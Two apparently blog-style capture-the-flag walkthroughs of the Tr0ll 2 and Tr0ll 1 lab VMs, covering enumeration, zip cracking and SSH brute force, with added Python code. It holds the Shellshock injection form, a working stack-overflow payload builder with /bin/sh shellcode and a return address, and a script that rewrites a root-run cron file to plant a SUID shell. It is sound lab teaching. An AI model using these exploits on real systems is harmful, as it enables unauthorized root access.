Hack the Tr0ll 2 (Boot2Root Challenge)

Hello everyone and welcome to this CTF challenge. This is the sequel to Tr0ll by Maleus. You can download the lab from here. The objective of this lab is to get root and read the flag.

The challenge is not especially tough; its difficulty is listed as beginner/intermediate.

Penetrating Methodologies

  • Network scanning (Nmap, Netdiscover)
  • Information gathering
  • Analysing web source code
  • Getting robots.txt
  • Directory enumeration with a wordlist built from robots.txt (Dirb)
  • Finding the encoded answer.txt file
  • Decoding the base64 text file
  • FTP login to fetch a zip file
  • Cracking the zip file (Fcrackzip)
  • Exploiting Shellshock over SSH to get a bash shell
  • Spawning a tty shell (Metasploit)
  • Privilege escalation
  • Finding the vulnerable binary
  • Finding the EIP offset
  • Exploiting the buffer overflow
  • Getting the root flag

So, let’s get started!

The first step, as always, is finding the target's IP. In my case it was 192.168.1.131.

Next we scanned the target for open ports with nmap.

The scan showed three open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).

So, we opened the IP in a browser to see what the web page held, and sure enough, that troll face again! The box really does live up to its name.

Next we pulled the home page's source code with curl:

We then ran dirb against the IP to find something interesting, and one result did catch our eye: robots.txt.

Opening robots.txt in the browser showed a long list of directory names.

So, we downloaded robots.txt with wget and turned it into a dictionary, in the hope that one of those names would lead somewhere useful.

(We removed the leading '/' from each line and saved the result as a wordlist.)

Running dirb again with that custom dictionary turned up a few more directories.
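The robots.txt-to-wordlist step above, as an added example that is not part of the original write-up. It strips the leading slash, skips the bare "Disallow: /" entry (which means "everything", not a directory) and deduplicates, then writes one word per line for dirb. The SAMPLE_ROBOTS text is constructed for illustration and only borrows the dont_bother name the write-up mentions; the real file on the VM is longer.

```python
"""Build a dirb wordlist from robots.txt entries.

Added example, not part of the original write-up: it automates the step
described above (download robots.txt, strip the leading '/', save one word
per line). SAMPLE_ROBOTS is constructed for illustration and only borrows
the dont_bother name that the write-up mentions; the real file is longer.
"""
import re
from pathlib import Path

SAMPLE_ROBOTS = """# constructed sample, not the VM's real robots.txt
User-agent: *
Disallow: /noob
Disallow: /nope
Disallow: /try_harder
Disallow: /keep_trying
Disallow: /noob/           # duplicate of an earlier entry, with trailing slash
Disallow: /dont_bother
Disallow: /ok_this_is_it
Disallow: /
Allow: /images/*.jpg$
Sitemap: http://192.168.1.131/sitemap.xml
"""

# Only Allow/Disallow lines carry paths; User-agent, Sitemap and comments do not.
_RULE = re.compile(r'^(?:allow|disallow)\s*:\s*(\S+)', re.IGNORECASE)


def robots_to_wordlist(text: str) -> list[str]:
    """Turn robots.txt rules into a deduplicated list of directory names.

    For each rule the path is stripped of leading/trailing '/', wildcard
    characters ('*', '$') are removed, and only the first path segment is
    kept so that nested entries still yield something dirb can request.
    A bare 'Disallow: /' means 'everything' and is skipped rather than
    turned into an empty word.
    """
    words: list[str] = []
    seen: set[str] = set()
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()      # drop comments
        match = _RULE.match(line)
        if not match:
            continue
        path = match.group(1).strip('/')
        if not path:
            continue
        word = path.split('/')[0].replace('*', '').replace('$', '')
        if word and word not in seen:
            seen.add(word)
            words.append(word)
    return words


def write_wordlist(words: list[str], path: str) -> int:
    """Write one word per line (the format dirb expects); return the count."""
    Path(path).write_text('\n'.join(words) + '\n')
    return len(words)


if __name__ == '__main__':
    # After: wget http://192.168.1.131/robots.txt
    source = Path('robots.txt')
    text = source.read_text() if source.exists() else SAMPLE_ROBOTS
    n = write_wordlist(robots_to_wordlist(text), 'robots_words.txt')
    print(f'wrote {n} words; next: dirb http://192.168.1.131/ robots_words.txt')
```

The first-segment rule is deliberate: dirb requests each word as a top-level directory, so a nested entry like /a/b would otherwise never be tried at all.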

So, we opened each directory in the browser and inspected its image, since the directories held nothing else to play with.

We went through them one by one, but nothing stood out: every one had the same troll image.

We checked the source code of each page as well, but nothing looked useful.


Hence, we downloaded cat_the_troll.jpg from each directory, and the copy in the directory called dont_bother was the interesting one.

We read the last few lines of the file with the tail command:

The text appended to the image said to look deep within "y0ur_self" for the answer. Could that be a directory? Let's find out.
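Why tail works here, as an added example that is not from the original write-up: a JPEG viewer stops at the End-Of-Image marker (FF D9), so anything appended after it is invisible in the image yet sits in the file. The code below walks the JPEG structure to find the real EOI (a plain search for the last FF D9 can be fooled by a trailer that contains those bytes), returns the trailer, and also pulls printable strings the way `strings` does, which is the same routine needed for the roflmao file in the Tr0ll 1 write-up further down this page. SAMPLE_JPEG is a constructed, minimal JPEG-shaped byte string with a made-up message appended, not the VM's image.

```python
"""Recover text appended after the end of a JPEG, and pull printable strings.

Added example, not from the original write-up. It reproduces what the
`tail` command revealed on cat_the_troll.jpg: the message was appended
after the image's End-Of-Image marker, where viewers never look. The same
ascii_strings() routine does what `strings roflmao` does in the Tr0ll 1
write-up further down. SAMPLE_JPEG is a constructed, minimal JPEG-shaped
byte string with a made-up message appended, not the VM's image.
"""
import re

SAMPLE_JPEG = (
    b'\xff\xd8'                                              # SOI
    + b'\xff\xe0' + (16).to_bytes(2, 'big')                  # APP0, length 16
    + b'JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00'
    + b'\xff\xda' + (8).to_bytes(2, 'big')                   # SOS, length 8
    + b'\x01\x01\x00\x00\x3f\x00'
    + b'\x12\x34\xff\x00\x56\xff\xd0\x78'                    # entropy-coded data: stuffed FF 00, RST0
    + b'\xff\xd9'                                            # EOI
    + b'Look deep within y0ur_self for the answer\n'         # constructed trailer
)

_STANDALONE = {0x01, 0xD8} | set(range(0xD0, 0xD8))          # markers with no length field


def jpeg_end_offset(data: bytes) -> int:
    """Offset just past the EOI marker, found by walking the JPEG segment by segment.

    A plain rfind(b'\\xff\\xd9') would be fooled by a trailer that itself
    contains FF D9 (or by an embedded thumbnail); walking the structure is
    not. Inside entropy-coded data an FF byte is always followed by 00
    (stuffing) or by an RSTn marker, so anything else is the next marker.
    """
    if data[:2] != b'\xff\xd8':
        raise ValueError('missing SOI marker; not a JPEG')
    n, pos = len(data), 2
    while pos + 1 < n:
        if data[pos] != 0xFF:
            raise ValueError(f'expected a marker at offset {pos}')
        marker = data[pos + 1]
        if marker == 0xFF:                    # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:                    # EOI
            return pos + 2
        if marker in _STANDALONE:
            pos += 2
            continue
        seg_len = int.from_bytes(data[pos + 2:pos + 4], 'big')
        pos += 2 + seg_len                    # length covers itself, not the marker
        if marker == 0xDA:                    # SOS: skip entropy-coded data
            while pos + 1 < n:
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError('no EOI marker found (truncated JPEG)')


def jpeg_trailer(data: bytes) -> bytes:
    """Everything after the image proper; b'' for a clean file."""
    return data[jpeg_end_offset(data):]


def ascii_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Printable-ASCII runs of at least min_len bytes, like `strings -n`."""
    pattern = rb'[\x20-\x7e]{%d,}' % min_len
    return [m.group().decode('ascii') for m in re.finditer(pattern, data)]


if __name__ == '__main__':
    trailer = jpeg_trailer(SAMPLE_JPEG)
    print(f'{len(trailer)} trailing bytes:', trailer.decode(errors='replace').strip())
    print('strings:', ascii_strings(SAMPLE_JPEG))
```

Run it against each downloaded cat_the_troll.jpg; a non-empty trailer is the one worth reading, and a zero-length trailer rules a file out faster than eyeballing tail output.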

Voila! It is indeed a directory, and it really does hold an answer.txt. On opening it, though, the wordlist inside appeared to be base64 encoded.

We downloaded answer.txt with wget and decoded it into a new file, decoded.txt.

We decoded it using:

Let's keep this dictionary for later and move on to another port we discovered: FTP.

We had no username or password, and no credential file had turned up anywhere.

But remember the very first source code we viewed? It carried the author name Tr0ll.

Could that be both the FTP username and a default password?

It was pure trial and error, but it worked: we were logged in!

On the FTP server we found a zip file, lmao.zip, but it was password protected.

Wait... what about the file we just decoded? Could it hold the password for the zip?

Running fcrackzip with decoded.txt as the dictionary found the password! Let's unzip the file now.

Enter the password: ItCantReallybeThisEasyRightLOL

The file inside, "noob", made us curious.

cat noob

It turned out to be an RSA private key, presumably for SSH.

Without delay we tried to log in over SSH with this key, and got trolled yet again: the key is accepted, but we do not get a usable shell.

A shot in the dark was to try the Shellshock bug through SSH. Shellshock works over SSH when the key is tied to a forced command: sshd exports the client's requested command to that forced command as the SSH_ORIGINAL_COMMAND environment variable, and a vulnerable bash executes a function definition planted in any environment variable, so a payload of the form '() { :;}; <command>' sent as the SSH command runs <command> on the server. So, we tried the command:

And we got logged in!

But it wasn't a proper tty. We used Metasploit's web_delivery module to generate a Python one-liner and get a proper meterpreter session.

We pasted the generated Python code into the bare shell we had just obtained.

Back in Metasploit, a meterpreter session opened.

Let's drop into a shell and try to spawn a proper tty.

The r00t binaries in these directories behave differently from one another, and which directory holds which binary is shuffled on every reboot. One of them (for us the one in door2, but it changes on reboot) accepts a string as its argument and prints it.

We open the binary in gdb to look at its disassembly. At main+71 there is a call to strcpy. strcpy copies its source until the terminating NUL with no bounds check, so an over-long argument overflows the destination buffer on the stack; that is what we exploit.

First we create a 500-byte cyclic string with Metasploit's pattern_create.rb to find the EIP offset.

We run the binary in gdb with the 500-byte pattern as its argument and find that EIP is overwritten with 0x6a413969.

Passing that value to /usr/share/metasploit-framework/tools/pattern_offset.rb gives an offset of 268. So we need 268 bytes of filler, followed by the address of the instructions we want executed.

After getting the offset we look at ESP and find it to be 0xbffffc70. But when we build the exploit around that address and run it, we get an illegal instruction: gdb gives the process a slightly different environment from a bare run, so the stack is shifted and the address is off. So we remove one byte, take ESP to be 0xbffffc80 instead, and run the binary with the environment cleared (for example with env -i) and the exploit as its argument. As soon as the exploit runs we get a shell as root. We open /root, find a file called Proof.txt, read it and find the final flag.
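The offset calculation and payload layout above, as an added example that is not the write-up's own exploit. pattern_create() and pattern_offset() reimplement what Metasploit's pattern_create.rb and pattern_offset.rb do, so the 268 can be reproduced from the EIP value 0x6a413969 without Metasploit, and build_payload() lays out the attack string the way the text describes: filler up to the saved return address, the address to jump to, a NOP sled, then shellcode. Assumptions: 0xbffffc80 is the address the write-up quotes and will differ on another machine; SHELLCODE is a generic 23-byte Linux x86 execve("/bin/sh") stub, not taken from the page; the 16-byte sled is a choice.

```python
"""Cyclic pattern, EIP offset and payload layout for the r00t overflow.

Added example, not the write-up's own exploit. pattern_create() and
pattern_offset() reimplement what Metasploit's pattern_create.rb and
pattern_offset.rb do, so the 268 can be checked without Metasploit, and
build_payload() lays the attack string out the way the text describes:
268 bytes of filler, the address to return to, a NOP sled, shellcode.
Assumptions: 0xbffffc80 is the address quoted in the write-up and will
differ on another machine; SHELLCODE is a standard 23-byte Linux x86
execve("/bin/sh") stub, not taken from the page; the sled length is a guess.
"""
import string
import struct
import sys

SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)  # assumption: generic execve("/bin/sh"): xor eax,eax; push "//sh","/bin"; ...; int 0x80


def pattern_create(length: int) -> bytes:
    """Aa0Aa1Aa2...Aa9Ab0...: every 4-byte window is unique (up to 20280 bytes)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Offset of the 4 bytes that ended up in EIP (read little-endian, as gdb shows it)."""
    idx = pattern.find(struct.pack('<I', eip))
    if idx == -1:
        raise ValueError('EIP value not in pattern: try a longer pattern or check endianness')
    return idx


def build_payload(offset: int, ret_addr: int, shellcode: bytes = SHELLCODE, nop_sled: int = 16) -> bytes:
    """[filler][ret_addr][NOP sled][shellcode]; ret_addr must land inside the sled.

    The buffer arrives via argv and strcpy, so a NUL byte anywhere would
    truncate it; that is checked here rather than discovered in gdb.
    """
    payload = b'A' * offset + struct.pack('<I', ret_addr) + b'\x90' * nop_sled + shellcode
    if b'\x00' in payload:
        raise ValueError('payload contains a NUL byte; strcpy/argv would cut it short')
    return payload


if __name__ == '__main__':
    # usage: env -i ./r00t "$(python3 exploit.py)"
    # (env -i reproduces the empty-environment run described above,
    # so ESP lands where it was measured)
    pat = pattern_create(500)
    offset = pattern_offset(pat, 0x6a413969)            # 268 on this binary
    sys.stdout.buffer.write(build_payload(offset, 0xbffffc80))
```

The sled is what absorbs the small difference between ESP inside gdb and ESP in a bare run: as long as the return address hits any NOP, execution slides into the shellcode, which is why a guess of 0xbffffc80 can work when 0xbffffc70 did not.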

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. Contact here.

Hack the Troll-1 VM (Boot to Root)

Hello friends, today we are going to solve another CTF challenge, "Troll 1" from the VulnHub labs. The challenge is not especially tough; its difficulty is listed as beginner/intermediate. You can download it from here: https://www.vulnhub.com/entry/tr0ll-1,100/

Penetrating Methodology

  • Network scanning (Nmap, netdiscover)
  • Anonymous FTP login
  • Web enumeration in the browser
  • Brute-force attack (Hydra)
  • SSH login
  • Privilege escalation
  • Getting root access
  • Capturing the flag

Let’s Begin!!

Start with netdiscover to identify the target IP on the local network; in my network the target was 192.168.1.102, yours will differ.

Next, let's enumerate open ports and the services behind them with the following nmap command:

The result showed port 21 (FTP), 22 (SSH) and 80 (HTTP) open. Moreover, FTP anonymous login is allowed.

So we opened the target IP in the web browser and were welcomed by the following image.

Since anonymous FTP login was allowed, we logged in as anonymous:anonymous and downloaded a file, lol.pcap.

Opening lol.pcap in Wireshark showed TCP traffic, and following the first TCP stream showed the image below.

In TCP stream 2 I noticed something suspicious: "sup3rs3cr3tdirlol". It could be a web directory. So let's dig further and figure out what sup3rs3cr3tdirlol points to.
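Following the TCP streams without Wireshark, as an added example that is not part of the original write-up. The parser below reads a classic libpcap file, groups TCP payloads into streams numbered in order of first appearance (as Wireshark's tcp.stream does, starting from 0), reassembles each one like Follow TCP Stream, and reports which stream contains a given string. SAMPLE_PCAP is constructed in memory: a made-up FTP exchange stands in for the real lol.pcap, and the addresses and taunt text are invented.

```python
"""Follow TCP streams in a pcap without Wireshark.

Added example, not part of the original write-up: it parses a classic
(libpcap) capture, groups TCP payloads into streams numbered in order of
first appearance (as Wireshark's tcp.stream does, starting at 0), and
searches them for a string, which is how sup3rs3cr3tdirlol turns up in
lol.pcap. SAMPLE_PCAP is constructed in memory with a made-up FTP exchange
standing in for the real capture; addresses and the taunt text are invented.
"""
import struct

LINKTYPE_ETHERNET = 1


def _ip(addr: str) -> bytes:
    return bytes(int(x) for x in addr.split('.'))


def _packet(src: str, sport: int, dst: str, dport: int, seq: int, payload: bytes) -> bytes:
    """One pcap record: Ethernet + IPv4 + TCP (PSH/ACK) + payload, checksums left zero."""
    tcp = struct.pack('!HHIIBBHHH', sport, dport, seq, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0, _ip(src), _ip(dst))
    frame = b'\x02' * 6 + b'\x04' * 6 + b'\x08\x00' + ip + tcp
    return struct.pack('<IIII', 0, 0, len(frame), len(frame)) + frame


PCAP_HEADER = struct.pack('<IHHiIII', 0xa1b2c3d4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
SAMPLE_PCAP = PCAP_HEADER + b''.join([        # constructed capture, not the VM's lol.pcap
    _packet('192.168.1.10', 40001, '192.168.1.102', 21, 1, b'USER anonymous\r\n'),
    _packet('192.168.1.102', 21, '192.168.1.10', 40001, 1, b'331 Please specify the password.\r\n'),
    _packet('192.168.1.102', 20, '192.168.1.10', 40002, 1,
            b"Well, well, well, aren't you just a clever little devil, "
            b"you almost found the sup3rs3cr3tdirlol :-P\r\n"),
    _packet('192.168.1.10', 40001, '192.168.1.102', 21, 17, b'PASS anonymous\r\n'),
])


def tcp_streams(pcap: bytes) -> list[list[tuple]]:
    """Return streams in first-seen order; each is a list of (src, dst, payload)."""
    magic, = struct.unpack_from('<I', pcap, 0)
    end = {0xa1b2c3d4: '<', 0xd4c3b2a1: '>'}.get(magic)
    if end is None:
        raise ValueError('not a classic pcap (pcapng and nanosecond variants not handled)')
    linktype, = struct.unpack_from(end + 'I', pcap, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f'unsupported link type {linktype}')
    streams: dict[tuple, list] = {}
    pos = 24
    while pos + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack_from(end + 'IIII', pcap, pos)
        pos += 16
        frame = pcap[pos:pos + incl_len]
        pos += incl_len
        if len(frame) < 34 or frame[12:14] != b'\x08\x00' or frame[23] != 6:
            continue                                   # not IPv4/TCP
        ihl = (frame[14] & 0x0F) * 4
        total_len = int.from_bytes(frame[16:18], 'big')
        tcp = frame[14 + ihl:14 + total_len]           # ignore Ethernet padding
        src = ('.'.join(map(str, frame[26:30])), int.from_bytes(tcp[0:2], 'big'))
        dst = ('.'.join(map(str, frame[30:34])), int.from_bytes(tcp[2:4], 'big'))
        data_off = (tcp[12] >> 4) * 4
        key = tuple(sorted([src, dst]))                # same key for both directions
        stream = streams.setdefault(key, [])
        if tcp[data_off:]:
            stream.append((src, dst, tcp[data_off:]))
    return list(streams.values())


def follow(stream: list[tuple]) -> bytes:
    """Concatenate payloads in capture order, like Wireshark's Follow TCP Stream."""
    return b''.join(payload for _, _, payload in stream)


def streams_containing(pcap: bytes, needle: bytes) -> list[int]:
    """Indexes (Wireshark-style, from 0) of streams whose bytes contain needle."""
    return [i for i, s in enumerate(tcp_streams(pcap)) if needle in follow(s)]


if __name__ == '__main__':
    for i, s in enumerate(tcp_streams(SAMPLE_PCAP)):
        print(f'--- tcp.stream {i} ---')
        print(follow(s).decode(errors='replace'))
    print('found in streams:', streams_containing(SAMPLE_PCAP, b'sup3rs3cr3tdirlol'))
```

To run it on the real capture, replace SAMPLE_PCAP with open('lol.pcap', 'rb').read(); note the parser assumes packets arrive in order and does not reorder by sequence number, which is fine for a small lab capture but not for a lossy one.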

So when I opened http://192.168.1.102/sup3rs3cr3tdirlol in the browser, it served the following page, where we found a file, roflmao, and downloaded it.

Then, using strings (a tool included in Kali Linux) on roflmao, we found the message 'Find the address 0x0856BF to proceed'.

Treating /0x0856BF as a possible web directory, I opened it in the browser, and it did list two sub-directories, as shown in the image below.

I opened both. /good-luck looked interesting: it holds a file lol.txt containing a wordlist, which might be useful for a brute-force attack on the SSH login. The other folder, /this_folder_contains_the_password, hinted that "Pass.txt" could be the password itself.

Then we copied the lol.txt wordlist into a file dict.txt to use as the username list (dropping its 5th line while pasting). With a username dictionary in hand and a good idea of the password, let's launch a brute-force attack against the SSH login; you can use the following Hydra command for this.

Great!! Here is our SSH credential: overflow:Pass.txt

With those credentials we logged in over SSH and spawned a tty shell on the victim's machine. Now let's finish the task quickly; for that we need to escalate to root.

We then enumerated all the writable files on the box with the command above.

We found a Python file, cleaner.py, inside /lib/log. It is a small script added by the admin to clean up junk files in /tmp, and it runs at a fixed interval. What makes it interesting is that it is writable by us but runs as root, so whatever we put in it runs as root.

There are many ways to get root from here; in this one we copy /bin/sh into /tmp and set the SUID bit on /tmp/sh. It is quite simple: open the file in an editor, for example nano cleaner.py, and replace the rm -r /tmp/* command with one that copies /bin/sh to /tmp/sh and sets the SUID bit on it.

After a short wait the job runs, creating an sh file inside /tmp with SUID permission; running it gives you a root shell.
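The writable-file hunt and the cleaner.py edit, as one added example that is not the write-up's own commands. writable_files() lists regular files the current user can write to but does not own (the class the find run above is looking for), and hijack() performs the edit described: the command inside the script's os.system() call is swapped for one that copies /bin/sh to /tmp and sets its SUID bit. CLEANER_ORIGINAL is my reconstruction of the shape of /lib/log/cleaner.py, not a copy of the VM's file; the chmod mode and the /tmp/sh name are choices, and the `me` parameter exists so the owner check can be exercised on files you own.

```python
"""Find writable files and hijack a root-run cleanup script.

Added example, not the write-up's own commands. writable_files() does what
the find command used above does (lists files the current user can write to
but does not own), and hijack() performs the edit described above: the rm
command in the script's os.system() call is replaced with one that copies
/bin/sh to /tmp and sets its SUID bit. CLEANER_ORIGINAL is my reconstruction
of the shape of /lib/log/cleaner.py, not a copy of the VM's file; the chmod
mode and /tmp/sh name are choices.
"""
import os
import re
import stat
from typing import Optional

CLEANER_ORIGINAL = """#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
"""

# /bin/sh on Ubuntu is dash, which keeps the effective uid; bash would need -p.
PAYLOAD = 'cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh'

_OS_SYSTEM = re.compile(r"os\.system\((['\"]).*?\1\)")


def writable_files(top: str, me: Optional[int] = None) -> list[str]:
    """Regular files under `top` that `me` (default: our euid) can write but does not own.

    A file we own is not interesting for escalation; one owned by root that
    we can still write to is, especially if cron runs it as root.
    """
    me = os.geteuid() if me is None else me
    hits = []
    for dirpath, _, names in os.walk(top):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_uid != me and os.access(path, os.W_OK):
                hits.append(path)
    return sorted(hits)


def hijack(script: str, payload: str = PAYLOAD) -> str:
    """Replace the command inside every os.system('...') call with `payload`."""
    new, count = _OS_SYSTEM.subn(lambda m: f"os.system('{payload}')", script)
    if count == 0:
        raise ValueError('no os.system() call found; nothing to hijack')
    return new


if __name__ == '__main__':
    # On the box: python3 escalate.py / 2>/dev/null, then edit the file it reports.
    for path in writable_files('/lib/log' if os.path.isdir('/lib/log') else '.'):
        print('writable, not ours:', path)
    print(hijack(CLEANER_ORIGINAL))
```

The hijacked script still cleans nothing, so the job succeeds silently; once /tmp/sh exists with mode 4755, run /tmp/sh and check id. If the copied shell turns out to be bash rather than dash, run it with -p or it will drop the effective uid.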

HURRAY!!! We hit the goal.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, social media lover and gadget enthusiast. Contact here.
